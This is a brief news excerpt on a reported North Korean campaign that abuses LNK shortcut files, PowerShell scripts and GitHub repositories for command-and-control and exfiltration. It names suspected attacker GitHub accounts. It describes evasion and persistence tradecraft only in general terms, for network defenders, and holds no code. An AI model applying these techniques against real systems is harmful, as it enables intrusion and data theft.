GitHub as C2: Researchers also highlighted the campaign’s use of GitHub as a C2 layer. Rather than communicating with suspicious-looking or newly registered domains, the malware interacts with GitHub repositories and APIs to receive instructions and exfiltrate data.”The fact that this shortcut file creates a chain that ultimately reaches out to a GitHub repository, and pulls scripts over the internet, should put network defenders on alert that even productivity platforms can be attack vectors,” Boote added.After infecting a system, the PowerShell scripts perform system checks to confirm the environment isn’t under analysis, ensure the malware persists after system reboot through the Scheduled Task, and collect detailed system information. Only then is a stable connection attempted with subsequent scripts, where additional modules and instructions are fetched from the attacker’s GitHub repository.The researchers flagged a GitHub account, “motoralis”, with consistent activity dating back to 2025, and other less frequent accounts, including “God0808RAMA,” “Pigresy80,” “entire73,” “pandora0009,” and “brandonleeodd93-blip.”Additionally, the blog post shared a set of URLs and hash functions to support detection efforts.
First seen on csoonline.com
Jump to article: www.csoonline.com/article/4154471/north-korean-hackers-abuse-lnks-and-github-repos-in-ongoing-campaign.html
